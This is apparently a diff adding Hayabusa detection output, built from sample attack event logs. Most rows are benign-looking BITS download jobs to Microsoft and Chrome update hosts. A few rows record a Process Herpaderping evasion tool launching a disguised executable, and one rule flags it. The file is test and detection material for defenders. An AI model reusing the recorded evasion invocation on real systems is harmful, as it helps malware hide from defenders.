+2020-10-24 06:58:22.391 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\config.xml | Process: C:\Windows\SysWOW64\rundll32.exe | PID: 8920 | PGUID: 747F3D96-51FE-5F93-0000-0010DC535E00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
+2020-10-24 22:15:50.672 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-24 22:53:41.949 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amaWj.img?w=100&h=100&m=6&tilesize=medium&x=1912&y=840&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-24 22:53:43.173 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161342140454_Images/LiveTileImages/MediumAndLarge/Image3.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-24 23:25:16.281 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-24 23:25:17.595 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-25 00:07:57.551 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amczd.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-25 00:07:57.815 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161342140454_Images/LiveTileImages/MediumAndLarge/Image2.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-25 05:37:35.394 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amg5S.img?w=100&h=100&m=6&tilesize=medium&x=2238&y=680&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-27 19:17:18.369 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\Downloads\samir.exe | Process: c:\Users\bouss\Downloads\ProcessHerpaderping.exe | PID: 21756 | PGUID: 00247C92-F3AE-5F97-0000-00106ABA0418,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx
+2020-10-27 19:17:18.377 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: c:\Users\bouss\Downloads\ProcessHerpaderping.exe | Tgt Process: samir.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 21756 | Src PGUID: 00247C92-F3AE-5F97-0000-00106ABA0418 | Tgt PID: 21048 | Tgt PGUID: 00247C92-F3AE-5F97-0000-00104EBD0418,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx
+2020-10-27 19:17:18.397 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: "".\samir.exe"" | Process: C:\Users\bouss\Downloads\samir.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ProcessHerpaderping.exe ""c:\Program Files\Internet Explorer\iexplore.exe"" .\samir.exe | LID: 0x1478dc6e | PID: 21048 | PGUID: 00247C92-F3AE-5F97-0000-00104EBD0418",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx
+2020-10-27 19:17:18.397 +09:00,LAPTOP-JU4M3I0E,1,medium,Exec,Suspicious File Characteristics Due to Missing Fields,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx
+2020-11-02 03:28:53.729 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-02 03:30:10.144 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-02 03:30:10.448 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-02 03:30:10.667 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: SetupBinary | URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0008/OneDriveSetup.exe,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-02 03:30:11.059 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: SetupBinary | URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0008/OneDriveSetup.exe,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-02 03:33:01.610 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-05 19:55:56.114 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{DE1AA2CB-2733-420D-BD53-D15E1761ED0D}-86.0.4240.183_86.0.4240.111_chrome_updater.exe | URL: http://r2---sn-5hnekn7d.gvt1.com/edgedl/release2/chrome/APOVneiKVAxsNCc0oAg3ibQ_86.0.4240.183/86.0.4240.183_86.0.4240.111_chrome_updater.exe?cms_redirect=yes&mh=T1&mip=213.127.67.78&mm=28&mn=sn-5hnekn7d&ms=nvh&mt=1604573655&mv=m&mvi=2&pl=17&shardbypass=yes,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-05 19:59:25.802 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-05 19:59:51.480 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-05 20:03:04.083 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aHmh2.img?w=100&h=100&m=6&tilesize=medium&x=2005&y=1451&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-05 20:03:05.093 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161342940453_Images/LiveTileImages/MediumAndLarge/Image1.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-05 20:03:06.197 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: http://blob.weather.microsoft.com:80/static/mws-new/WeatherImages/210x173/29.jpg?a,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-05 21:31:12.664 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-05 21:31:12.941 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-05 21:33:21.719 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aFbhf.img?w=100&h=100&m=6&tilesize=medium&x=2920&y=321&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-06 00:25:28.955 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aIYx8.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-06 00:25:30.216 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161342940453_Images/LiveTileImages/MediumAndLarge/Image3.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-06 19:52:28.687 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aKxpG.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-06 23:56:52.824 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-08 00:33:50.498 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19R5M0.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-08 00:36:30.267 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-08 00:36:30.760 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-09 17:25:00.043 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-09 17:28:07.533 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-09 17:28:08.240 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-09 20:33:58.291 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aPIV0.img?w=100&h=100&m=6&tilesize=medium&x=1544&y=1092&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-09 20:33:58.749 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image2.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-09 20:33:59.731 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: http://blob.weather.microsoft.com:80/static/mws-new/WeatherImages/210x173/32.jpg?a,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-09 22:29:29.376 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-09 22:29:29.868 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-10 21:35:58.814 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-10 21:36:00.732 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-11 21:51:23.040 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-11 21:51:33.078 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.703 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.714 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.718 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.722 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.743 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.748 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.752 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.756 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.788 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.794 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.798 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.802 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.899 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.906 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.910 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.913 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 19:56:13.148 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{9FF0B339-0202-4A5B-B73E-CFFB4FCBD124}-86.0.4240.193_86.0.4240.183_chrome_updater.exe | URL: http://r2---sn-5hne6nsy.gvt1.com/edgedl/release2/chrome/QX5U7YrFu2EjtutZ_UHwBg_86.0.4240.193/86.0.4240.193_86.0.4240.183_chrome_updater.exe?cms_redirect=yes&mh=qK&mip=213.127.67.111&mm=28&mn=sn-5hne6nsy&ms=nvh&mt=1605092117&mv=m&mvi=2&pl=17&shardbypass=yes,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 21:44:50.465 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 23:12:22.524 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aULGJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
